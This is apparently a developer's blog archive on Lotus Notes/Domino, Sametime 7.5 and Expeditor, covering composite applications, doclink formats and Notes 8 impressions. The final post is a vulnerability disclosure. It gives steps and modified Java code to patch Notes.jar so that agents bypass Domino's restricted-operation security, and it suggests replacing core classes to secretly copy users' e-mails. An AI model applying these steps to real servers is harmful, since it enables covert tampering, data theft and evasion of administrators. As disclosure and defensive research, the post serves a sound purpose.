Composite thinking

In the issue of the Lotus developerWorks newsletter that I received in my inbox today there is a link to an article on creating applications using the Property Broker of Lotus Expeditor (Creating collaborative components for IBM Lotus Expeditor Property Broker). This was kind of funny since it coincided with me receiving a Java newsletter with an article on using the PropertyChangeListener of the Java SDK.

For those not in the know, the Property Broker is the middleware which is used in the Lotus Expeditor framework to dispatch property change events between components and hence is the glue that makes the different components of a composite application work together. The Property Broker is configured either declaratively using a UI or using an API.

The approaches described in the two articles are quite similar and both describe how using a declarative approach (much like extension points in Sametime 7.5 development) allows for much more flexible solutions that are less brittle and less prone to breaking caused by API changes. An added benefit is the absence of compile time checks which means that you may develop and deploy components that don’t need to know of any other components that act on the property changes they fire. The alternative to declarative events is the use of the Observer design pattern and Listener-interfaces en masse e.g. like in Swing.

Reading the articles has really got me thinking about how to leverage these capabilities in new and existing applications. I see great possibilities and the possibility of having many applications work together to form a greater whole.

I think the advent of composite applications will mean that the job of the application architect will become more challenging and you need to change the point of view from which applications are designed and developed. Applications will move from being monolithic entities to being composite and hence you need to decide on which properties to expose and how to work with “client” applications. This you need to decide on at design time. Applications should be designed and built as smaller interconnected components and not as the CD-ROM AutoInstall, 7-databases-in-one, applications of today.

Sounds intriguing but challenging…

All these possibilities are exciting and it will be interesting to see how many of the Lotus Expeditor capabilities will be exposed by the Notes 8 client and how many Notes 8 customers will pick up on it.

Becoming a NOMAD

I received my new 4GB USB key today and have already loaded Notes 7.0.2 on it using Chris’ excellent howto (Lotus Notes 7.0.2 – NOMAD Review). There wasn’t much to it and I didn’t even have to manually add admin.exe and designer.exe since I used a full Notes install image. Very nice… 🙂

The USB key comes loaded with the U3 software so now I need to find an IPSEC VPN client that is U3 compatible or one that can be installed on a USB key to be on Cloud Nine. The client should work with Cisco appliances.

Looking forward to lighter roaming.

J9 Launching plug-in for Sametime 7.5 development

Since I get some questions on how to find this plugin I thought I would post the URL. The plugin can be downloaded here (link to full URL at dev.eclipse.org) or you can get it via this http://tinyurl.com/w97so as long as it works… This is even more relevant where the link posted in the Integration Guide of the Sametime 7.5 Java SDK doesn’t work anymore.

What brilliant person decided to publish a document with a link pointing directly into CVS with specifying the revision? I would say that a short redirection link via ibm.com would make much more sense!

IBM Workplace Designer mentioned in Eclipse Magazine


IBM Workplace Designer is mentioned and used as an example on how to leverage Eclipse as a foundation for rich-client applications. Too bad Expeditor, Sametime or Notes 8 isn’t mentioned…

Eclipse Power in IBM Workplace/Domino
“Eclipse is a robust functional platform that IBM Workplace/Domino developers can put to full use in their current and future projects. In this article, we focus on the benefits of Eclipse as a client foundation that has a cross platform, rich UI widget set that is based on native widgets, a rich UI framework, pre-defined dialog basis: Wizards, Preferences, Properties, and other UI: Perspectives, Views, Editors, Workbench (as a base), ActiveX support in SWT on Win32 (platform integration), and a good Help system. Eclipse as a client foundation is an extensible platform that features a plug-in extensibility model, shared programming model with tools development, education that is already developed for tools offerings, core services, extension points, core frameworks, production quality platform with two major releases in the market, and an Open Source code base.”

Eclipse Magazine, Issue 5, December 2006.

Doclinks in Sametime 7.5

You might know that a doclink is actually nothing more than some text in a special format. The below snippet is a doclink to an e-mail in my mail database. As you can see it contains the replica id of the database and the UNID of the view and the document to go to.

Mikkel Heisterberg - Vedr.: Re: mail sync.
<NDL>
<REPLICA C1256833:0079BF90>
<VIEW OF38D46BF5:E8F08834-ON852564B5:00129B2C>
<NOTE OF1B86D647:A8161190-ONC125723D:005E6086>
<HINT>CN=server1/O=Example</HINT>
<REM>Database 'Mikkel Heisterberg', View 'Inbox', Document 'Vedr.: Re: mail sync.'</REM>
</NDL>

The same is the case for a view link except that there’s no document UNID present.

Mikkel Heisterberg - Inbox
<NDL>
<REPLICA C1256833:0079BF90>
<VIEW OF38D46BF5:E8F08834-ON852564B5:00129B2C>
<HINT>CN=server1/O=Example</HINT>
<REM>Mikkel Heisterberg</REM>
</NDL>

A database link is even more slimmed down and it only contains the replica id of the target. For some reason the chat area fails to convert this into a notes:// URL – could be that the regular expression IBM uses to match a doclink doesn’t take database links into account.

Mikkel Heisterberg - Inbox
<NDL>
<REPLICA C1256833:0079BF90>
<HINT>CN=server1/O=Example</HINT>
<REM>Mikkel Heisterberg</REM>
</NDL>

Does anyone know whether this is a known issue or something I should report to Lotus Support or even worse write myself? Actually I don’t think it would take too long to write since it’s a slight modification of the acronym sample plugin supplied with the Sametime SDK. I would of course prefer not to… 😉
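A sketch of the kind of matcher discussed above, as an added example (not IBM's code and not the acronym sample from the SDK): one regular expression in which the view and document parts are optional, so all three link kinds shown in this post are converted. The class name, the notes://server/replica/view/document layout of the resulting URL and the use of the common name from <HINT> as the server part are assumptions.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class DoclinkToUrl {
    private static final String HEX8 = "([0-9A-F]{8})";
    // Text form of a UNID as it appears in the snippets: OFxxxxxxxx:xxxxxxxx-ONxxxxxxxx:xxxxxxxx
    private static final String UNID = "OF" + HEX8 + ":" + HEX8 + "-ON" + HEX8 + ":" + HEX8;
    // <VIEW> (and <NOTE> inside it) are optional, so database, view and document links all match.
    // Only hex digits and a hostname-like server name are taken over from the chat text.
    private static final Pattern NDL = Pattern.compile(
        "<NDL>\\s*<REPLICA " + HEX8 + ":" + HEX8 + ">\\s*"
        + "(?:<VIEW " + UNID + ">\\s*(?:<NOTE " + UNID + ">\\s*)?)?"
        + "<HINT>(?:CN=)?([A-Za-z0-9._-]+)(?:/[^<]*)?</HINT>\\s*"
        + "(?:<REM>[^<]*</REM>\\s*)?</NDL>",
        Pattern.CASE_INSENSITIVE);

    /** Returns a notes:// URL for the first doclink found in text, or null if there is none. */
    static String toNotesUrl(String text) {
        Matcher m = NDL.matcher(text);
        if (!m.find()) return null;
        StringBuilder url = new StringBuilder("notes://").append(m.group(11));
        appendHex(url, m, 1, 2);                           // replica id
        if (m.group(3) != null) appendHex(url, m, 3, 6);   // view UNID
        if (m.group(7) != null) appendHex(url, m, 7, 10);  // document UNID
        return url.toString();
    }

    private static void appendHex(StringBuilder url, Matcher m, int from, int to) {
        url.append('/');
        for (int g = from; g <= to; g++) url.append(m.group(g).toUpperCase());
    }

    public static void main(String[] args) {
        // The three link kinds from the post, assembled from the values shown above.
        String head = "<NDL>\n<REPLICA C1256833:0079BF90>\n";
        String view = "<VIEW OF38D46BF5:E8F08834-ON852564B5:00129B2C>\n";
        String note = "<NOTE OF1B86D647:A8161190-ONC125723D:005E6086>\n";
        String tail = "<HINT>CN=server1/O=Example</HINT>\n<REM>Mikkel Heisterberg</REM>\n</NDL>";
        System.out.println(toNotesUrl(head + view + note + tail)); // document link
        System.out.println(toNotesUrl(head + view + tail));        // view link
        System.out.println(toNotesUrl(head + tail));               // database link
    }
}
```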

Playing around with Notes 8

As mentioned previously I have a couple of friends who work at IBM and while at a social Christmas gathering last night one of them showed me the build of Notes 8 he is running on his work laptop (Notes 8, M3). It was quite funny to actually see the product and I think I have to pay him a visit later in the week to play a little more with the client.

I only played with it briefly but my first impression is that it looks nice and more Windows-like (in a positive way!). It sure still looks and feels like Notes but with a touch of Expeditor/Eclipse RCP. The most noticeable differences are that the bookmark bar on the left is gone, there is a Start-style launcher button on the top left and a bar with miniapps (Sametime, RSS feeds, today’s calendar etc.) on the right. Other than that the old-style preferences have been replaced with standard Eclipse style preference pages but other than that it looks like you would expect. I don’t think most users will have any problems getting used to it.

I’m sure there’s tons more, but those are my first impressions. Funny to actually see the client we’ve been hearing about for months now from Mary-Beth Raven and Ed Brill.

I have been doing a lot of Sametime 7.5 plugin development over the last couple of weeks so I can really see the benefit of the miniapp-sidebar. I think miniapps and the concept of the sidebar is going to be a really valuable addition to the application portfolio. I need to look more into this as I explore the client and see how the miniapps are wired into the client and how to make them respond to events in the client such as opening new applications etc.

As an aside I really hope we get to share miniapps between Sametime and Notes 8 without having to recompile… I have my doubts of this though, as the extension point used in Sametime 7.5 for miniapps looks and sounds quite Sametime 7.5 specific but I hope I’m wrong.

Is the security of the Notes/Domino Java implementation questionable? (security vulnerability in the Notes/Domino Java API)

DISCLAIMER
The information below is provided as-is and I cannot be held liable for any damages, direct or indirect, caused by the information in this post or based on the below findings. The information here is offered in the interest of full disclosure. I have been working with IBM Lotus to diagnose and pinpoint the exact consequences of the below findings since May 2006.

Description

As you might know a central security measure in the Notes/Domino security infrastructure is the difference between restricted and unrestricted operations. Only users granted unrestricted access may perform sensitive operations such as disk I/O and manipulating the system clock. The implementation flaw I found in the Java API of Notes/Domino allows me to circumvent these restrictions and hence circumvent the security settings of the Domino server.

As such the guidelines given in this post could also be used to fully replace the Java API and perform additional operations without the knowledge of the owner of the Domino server or Notes client.

Prerequisites

  • Disk access to the Domino server or Notes client, or the ability to write an agent or other piece of code that may accomplish the task for you.

Steps to reproduce

Below I describe the steps necessary to circumvent the SecurityManager and/or hide malicious code.

  1. Obtain a copy of the Notes.jar file from the Domino server and copy it to a local workstation.
  2. Unpack the archive using the jar-command.
  3. Decompile the code (I used the JODE version 1.1.2-pre2 decompiler from http://jode.sourceforge.net)
  4. Using Eclipse, or similar, edit the code in the constructor of the lotus.notes.AgentSecurityContext class as shown below:
    public AgentSecurityContext(ThreadGroup threadgroup, boolean bool) {
      m_restricted = bool;
      m_file_read = true;
      m_file_write = true;
      m_net_access = true;
      m_class_loader = true;
      m_extern_exec = true;
      m_native_link = true;
      m_system_props = true;
    
      try {
        AgentSecurityManager agentsecuritymanager = (AgentSecurityManager) System
          .getSecurityManager();
        if (agentsecuritymanager != null)
        agentsecuritymanager.newSecurityContext(this, threadgroup);
       } catch (ClassCastException classcastexception) {
         /* empty */
       }
    }
    
  5. Compile the class and replace the version from the unpacked Notes.jar
  6. Create a new Notes.jar with the manipulated code and replace the Notes.jar on the server. You might have to shutdown the server/client to be able to replace the file.

Using a Domino server in a virtual machine I created a text file called readme.txt in the root of the c-drive on the server and ran the below agent as scheduled on the server. The agent tries to read data from the readme.txt file in the root of the c-drive on the local server (Windows 2000 Server). As expected the JVM throws a java.lang.SecurityException using the Notes.jar supplied with the Domino installation. If I replace the Notes.jar supplied by IBM with my manipulated Notes.jar the agent runs to completion without any incident thus circumventing the security measures put in place by the Domino server.

import lotus.domino.*;
import java.io.*;

public class JavaAgent extends AgentBase {
   public void NotesMain() {
      try {
         Session session = getSession();
         AgentContext agentContext = session.getAgentContext();

         System.out.println("Starting to run agent...");
         FileReader r = new FileReader("c:\\readme.txt");
         StringBuffer buffer = new StringBuffer();
         char[] data = new char[128];
         r.read(data, 0, 127);
         buffer.append(data);
         System.out.println("File data: " + buffer.toString());
         r.close();

      } catch(Exception e) {
         e.printStackTrace();
      }

      System.out.println("Done running agent...");
   }
}

Consequences

One thing is being able to circumvent the restricted/unrestricted security measure of the Domino server. Another thing is that this can be done without the administrator or users knowing about it.

As mentioned above you might even be able to use the steps to replace some of the core classes (such as the class implementing the Document interface). By doing this you could have the manipulated class send you a copy of all e-mails generated using the Document.send() method or to add a specific user to all reader/author fields being written to documents.

This should be possible since all the Domino API types are interfaces and as such are open for re-implementation. It does however also mean that you have to manipulate the factory methods of the API.

I must stress that I haven’t tried this myself – yet…

Suggestions

Issues like this could be avoided by digitally signing the Notes.jar file provided by IBM and having the Domino server and Notes client verify the signature of the jar-file before loading classes from it. Since a lock is placed on the jar-file by the operating system once read (at least on Windows), the impact on performance should be minimal since the jar-file only needs to be checked once.

As an aside I can mention that some of the jar-files provided with the Domino server/Notes client are digitally signed by IBM already:

  • ibmjcefips.jar
  • ibmjceprovider.jar
  • ibmpkcs11.jar
  • ibmpkcs11impl.jar

Resources